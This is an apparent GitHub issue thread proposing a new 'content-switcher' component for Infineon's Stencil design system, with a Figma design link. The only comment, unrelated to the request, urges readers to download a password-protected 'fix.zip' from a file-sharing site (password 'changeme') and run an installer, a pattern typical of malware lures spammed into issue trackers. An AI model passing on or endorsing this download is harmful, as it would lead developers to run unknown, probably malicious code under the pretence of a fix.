### ISSUE TITLE
New Component: content-switcher

### ISSUE THREAD

**Issue by tishoyanchev** [Infineon/infineon-design-system-stencil#1432]
Design reference:
https://www.figma.com/design/zPvPwPgb4EsYFXKC2nhzSG/Infineon-DDS-%7C-Main?node-id=63857-4879&m=dev

**Comment by xiaobai-marker** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
